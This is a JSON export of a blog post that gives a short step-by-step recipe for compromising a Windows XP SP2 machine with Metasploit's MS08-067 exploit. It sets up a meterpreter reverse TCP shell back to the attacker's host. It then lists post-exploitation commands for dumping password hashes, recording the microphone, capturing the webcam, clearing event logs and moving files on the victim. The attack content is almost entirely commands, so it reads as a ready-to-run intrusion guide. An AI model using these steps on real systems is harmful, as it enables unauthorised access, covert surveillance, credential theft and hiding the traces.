{"id":54,"date":"2014-12-13T21:45:52","date_gmt":"2014-12-14T03:45:52","guid":{"rendered":"http:\/\/sinjinsmith.net\/?p=54"},"modified":"2016-06-29T13:16:34","modified_gmt":"2016-06-29T18:16:34","slug":"using-kali-linux-to-attack-winxp-sp2","status":"publish","type":"post","link":"https:\/\/sinjinsmith.net\/?p=54","title":{"rendered":"Using Kali Linux to Attack WinXP SP2"},"content":{"rendered":"<p>Windows XP SP 2 Setup:<\/p>\n<p>Make sure Automatic Updates are disabled, the Windows Firewall is off, and the system has been restarted at least once.<\/p>\n<p>Metasploit:<\/p>\n<blockquote><p>use exploit\/windows\/smb\/ms08_067_netapi<\/p>\n<p>set rhost 192.168.1.45<\/p>\n<p>exploit #Do not execute at this point if you want to add the payload below<\/p>\n<p>? or help #see the list of available meterpreter commands<\/p>\n<p>set PAYLOAD windows\/meterpreter\/reverse_tcp<\/p>\n<p>set LHOST &lt;attacking_kali_host_ip&gt;<\/p>\n<p>set LPORT &lt;local_port&gt; #default port is 4444<\/p><\/blockquote>\n<p>You can verify the connection from the remote machine with the following command:<\/p>\n<blockquote><p>netstat -a | grep 4444 #4444 assumes default local port<\/p><\/blockquote>\n<p>Some interesting Meterpreter commands are:<\/p>\n<blockquote><p>hashdump #get password hashes to crack, crackstation.net<br \/>\nrecord_mic #record audio<br \/>\nwebcam_list #list available webcams<br \/>\nwebcam_snap #take a picture with the webcam<br \/>\nwebcam_stream #stream video from webcam<br \/>\nsysinfo #get remote system information<br \/>\nshutdown #turn off remote computer<br \/>\nreboot #reboot remote computer<br \/>\nps #list processes running on remote computer<br \/>\nkill #end process running on remote computer<br \/>\nexecute -f &lt;file&gt; #start program on remote machine<br \/>\nclearev #clear the event log<br \/>\nupload #send file to remote system<br \/>\ndownload #retrieve file from remote 
system<\/p><\/blockquote>\n","protected":false},"excerpt":{"rendered":"<p>Windows XP SP 2 Setup: Make sure Automatic Updates are disabled, the Windows Firewall is off, and the system has been restarted at least once. Metasploit: use exploit\/windows\/smb\/ms08_067_netapi set rhost 192.168.1.45 exploit #Do not execute at this point if you want to add the payload below ? or help\u00a0#see the list of available meterpreter commands [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,8,9],"tags":[],"class_list":["post-54","post","type-post","status-publish","format-standard","hentry","category-linux","category-metasploit","category-security"],"_links":{"self":[{"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=\/wp\/v2\/posts\/54","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=54"}],"version-history":[{"count":4,"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=\/wp\/v2\/posts\/54\/revisions"}],"predecessor-version":[{"id":110,"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=\/wp\/v2\/posts\/54\/revisions\/110"}],"wp:attachment":[{"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=54"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=54"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=54"}],"curies":[{"name":"wp","href":"https:\/\/api
.w.org\/{rel}","templated":true}]}}